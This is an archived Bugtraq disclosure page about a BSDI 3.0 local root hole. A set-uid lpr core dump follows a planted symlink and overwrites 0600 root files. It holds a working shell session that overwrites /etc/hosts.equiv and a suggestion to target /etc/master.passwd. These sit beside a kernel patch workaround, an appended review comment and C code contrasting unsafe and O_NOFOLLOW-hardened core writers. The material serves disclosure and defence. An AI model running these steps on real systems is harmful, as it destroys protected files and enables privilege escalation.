BSDI 3.0 symlink hole

Summary

Description: BSDI 3.0 apparently lets a local user force a core dump from a set-uid program (lpr in the report below), and the kernel writes the core file through a symlink, overwriting whatever the symlink points to.
Author: Stacey Son <sson@ISERVER.COM> and Ariel Biener <ariel@FIREBALL.TAU.AC.IL>
Compromise: root (local)
Vulnerable Systems: BSDI 3.0; other versions don't seem to be affected.
Date: 20 June 1997

Details


Date: Fri, 20 Jun 1997 20:53:16 +0300
From: Ariel Biener <ariel@FIREBALL.TAU.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Core file anomalies under BSDi 3.0

On Thu, 19 Jun 1997, Nir Soffer wrote:

[.snip.]
> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with privileges isn't necessary.
>
> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.


Hmm, this is not my experience:

slingshot: {2} % id
uid=100(ariel) gid=20(staff) groups=20(staff), 0(wheel)
slingshot: {3} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  0 Jun 20 22:43 /etc/hosts.equiv
slingshot: {4} % ln -s /etc/hosts.equiv lpr.core
slingshot: {5} % lpr
^Z
Suspended
slingshot: {6} % kill -ABRT %1
slingshot: {7} % fg
lpr
Abort (core dumped)
slingshot: {8} % ls -l /etc/hosts.equiv
-rw-------  1 root  wheel  167936 Jun 20 22:45 /etc/hosts.equiv
slingshot: {9} % su
Password:
Jun 20 22:46:34 slingshot su: ariel to root on /dev/ttyp0
slingshot: {1} % uname -a
BSD/OS slingshot.tau.ac.il 3.0 BSDI BSD/OS 3.0 Kernel #0: Mon Jun 16
19:51:22 IDT 1997
root@slingshot.tau.ac.il:/usr/src/sys/compile/SLINGSHOT  i386

It won't work if the target file is *not* mode 0600.

--Ariel

>
> C.) BSDi _does_ change the permissions of the core dump to 600, and it
> keeps on being owned by root, so changing the file is impossible as well.
>
> Regards,
> Nir.
>
> --
> Nir Soffer AKA ScorpioS, scorpios@cs.huji.ac.il .
> USER, n.:
>         The word computer professionals use when they mean "idiot."
>                 -- Dave Barry, "Claw Your Way to the Top"
>

   +---------------------------------------------------------+
   | Ariel Biener                                            |
   | e-mail: ariel@post.tau.ac.il        Work ph: 03-6406086 |
   +---------------------------------------------------------+

Date: Fri, 20 Jun 1997 17:17:25 -0600
From: Stacey Son <sson@ISERVER.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Core file anomalies under BSDi 3.0

[Stuff Deleted]

> A.) BSDi doesn't give a damn that the euid!=ruid, so finding a setgid
> program with privileges isn't necessary.

It seems BSDI broke this in 3.0.  BSD/OS 2.1 does not have this
problem as far as I can tell.  Below is a quick workaround until BSDI
comes out with something.  Apply the patch to kern/kern_sig.c.  A real
fix would require setting the P_SUGID flag in the exec handler in
kern_exec.c.

> B.) BSDi _does_ however, check if the file exists, so it's quite
> impossible to overwrite files.

Not exactly.  Try "ln -s /etc/master.passwd /tmp/lpr.core", for
example. :-0 It seems if the permissions are 0600 on the file you link
to it will overwrite the file.

Regards,

stacey@iserver.com

---snip--snip------------------------------------------------------------
*** kern_sig.c.orig     Tue Oct 15 12:23:05 1996
--- kern_sig.c  Fri Jun 20 16:26:08 1997
***************
*** 1198,1206 ****
         * Don't dump if not root and the process has used set user or
         * group privileges.
         */
!       if (p->p_flag & P_SUGID &&
!           (error = suser(p->p_ucred, &p->p_acflag)) != 0)
!               return (error);

        /* Don't dump if will exceed file size limit. */
        if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=
--- 1198,1208 ----
         * Don't dump if not root and the process has used set user or
         * group privileges.
         */
!       if ((p->p_flag & P_SUGID || p->p_cred->p_ruid != p->p_ucred->cr_uid) &&
!           /*(error = suser(p->p_ucred, &p->p_acflag)) != 0)
!               return (error);*/
!           p->p_cred->p_ruid)
!               return EPERM;

        /* Don't dump if will exceed file size limit. */
        if (ctob(UPAGES + vm->vm_dsize + vm->vm_ssize) >=
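Review bot: the suser() call left commented out in the middle of the `if` condition (the `/*(error = suser(...` and `return (error);*/` lines) makes the live condition hard to read, and `error` is no longer assigned at this point, so check whether it is still used elsewhere in the function or the compiler will flag it as unused. Suggest deleting the dead lines and writing the gate on one expression, keeping the file's `return (...)` style: `if ((p->p_flag & P_SUGID || p->p_cred->p_ruid != p->p_ucred->cr_uid) && p->p_cred->p_ruid != 0) return (EPERM);`. A comment should also record the semantic change: the dump is now refused for any process with a non-zero real uid that is set-id or has mismatched real and effective uids, while a real-root process dumps regardless, whereas the original consulted suser() on the effective uid. Since the hunk only tightens who may dump and does not touch how the core path is opened, it is a workaround for the set-uid case rather than a fix for the symlink following, as the message itself says.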

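The two writers below are an added illustration, not code from either message or from BSD/OS: a core writer that opens the dump path with a plain open() follows the planted lpr.core symlink and fills the 0600 target, while one that opens with O_NOFOLLOW and checks the descriptor with fstat() refuses it. The scratch directory under /tmp, the file names and the dump bytes are constructed for the example.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
static const char CORE_DATA[] = "ELF core contents (constructed)";  /* stand-in dump */

/* Naive writer: plain open() follows a symlink, so a planted "lpr.core"
 * link sends the dump into whatever the link points at. Returns bytes written. */
static ssize_t write_core_naive(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, CORE_DATA, sizeof CORE_DATA - 1);
    close(fd);
    return n;
}

/* Hardened writer: O_NOFOLLOW makes open() fail with ELOOP when the last path
 * component is a symlink, and fstat() confirms a regular, singly linked file. */
static ssize_t write_core_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    ssize_t n = write(fd, CORE_DATA, sizeof CORE_DATA - 1);
    close(fd);
    return n;
}

/* Rebuilds the posts' scenario in a scratch directory (empty 0600 target plus a
 * core-named symlink to it), runs writer on the symlink and returns the target's
 * size afterwards, -1 on setup failure: nonzero means the target was overwritten. */
static long run_scenario(ssize_t (*writer)(const char *))
{
    char dir[] = "/tmp/corelinkXXXXXX", target[64], link[64];
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/lpr.core", dir);
    int fd = open(target, O_WRONLY | O_CREAT, 0600);
    if (fd < 0 || symlink(target, link) != 0) return -1;
    close(fd);
    writer(link);
    struct stat st;
    long size = stat(target, &st) == 0 ? (long)st.st_size : -1;
    unlink(link); unlink(target); rmdir(dir);
    return size;
}
```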
This page is part of Fyodor's exploit world.